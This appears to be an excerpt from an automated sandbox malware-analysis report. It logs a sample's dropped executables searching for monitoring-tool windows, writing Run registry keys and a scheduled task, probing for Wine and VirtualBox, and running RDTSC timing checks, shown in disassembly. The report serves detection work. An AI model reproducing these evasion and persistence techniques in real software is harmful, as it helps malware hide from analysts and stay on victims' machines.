Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 21024c5511.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 21024c5511.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 996773cd54.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 996773cd54.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 036e90e395.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 036e90e395.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E2928 second address: 11E292C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1A2D second address: 11E1A56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60513h 0x00000007 jmp 00007F76D8D6050Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F76D8D60506h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1BB7 second address: 11E1BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1BBC second address: 11E1BC1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1BC1 second address: 11E1BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F76D9275001h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E1BDE second address: 11E1BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E2190 second address: 11E219C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E5628 second address: 11E562F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E562F second address: 11E5666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F76D9275008h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F76D9274FFEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E56CD second address: 11E5732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60515h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007F76D8D60510h 0x00000011 pop edi 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 popad 0x00000019 nop 0x0000001a mov di, FB08h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 jmp 00007F76D8D60511h 0x00000026 pop esi 0x00000027 call 00007F76D8D60509h 0x0000002c push eax 0x0000002d push edx 0x0000002e jne 00007F76D8D6050Ch 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E5732 second address: 11E580D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76D9274FFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jo 00007F76D9274FFAh 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007F76D9274FFCh 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 jmp 00007F76D9274FFAh 0x00000026 pushad 0x00000027 jmp 00007F76D9274FFCh 0x0000002c push esi 0x0000002d pop esi 0x0000002e popad 0x0000002f popad 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 pushad 0x00000035 jmp 00007F76D9274FFAh 0x0000003a jmp 00007F76D9275007h 0x0000003f popad 0x00000040 pop eax 0x00000041 push 00000003h 0x00000043 sub esi, 1E72193Dh 0x00000049 push 00000000h 0x0000004b call 00007F76D9275000h 0x00000050 sub dword ptr [ebp+122D2F1Eh], ecx 0x00000056 pop edi 0x00000057 push 00000003h 0x00000059 mov dword ptr [ebp+122D2EE3h], eax 0x0000005f push 975FB510h 0x00000064 push edx 0x00000065 jl 00007F76D9274FF8h 0x0000006b pop edx 0x0000006c xor dword ptr [esp], 575FB510h 0x00000073 movzx edi, cx 0x00000076 lea ebx, dword ptr [ebp+1245A552h] 0x0000007c push eax 0x0000007d pushad 0x0000007e jnc 00007F76D9274FFCh 0x00000084 pushad 0x00000085 jmp 00007F76D9275001h 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E5883 second address: 11E592A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and ecx, 369BF0E6h 0x00000010 push 00000000h 0x00000012 adc edx, 11FFD915h 0x00000018 push 6B1891A1h 0x0000001d jno 00007F76D8D60518h 0x00000023 xor dword ptr [esp], 6B189121h 0x0000002a jmp 00007F76D8D60518h 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F76D8D60508h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b mov si, ax 0x0000004e push 00000000h 0x00000050 add ch, FFFFFF87h 0x00000053 push 00000003h 0x00000055 mov edx, 61C4517Bh 0x0000005a call 00007F76D8D60509h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jo 00007F76D8D60506h 0x00000069 rdtsc
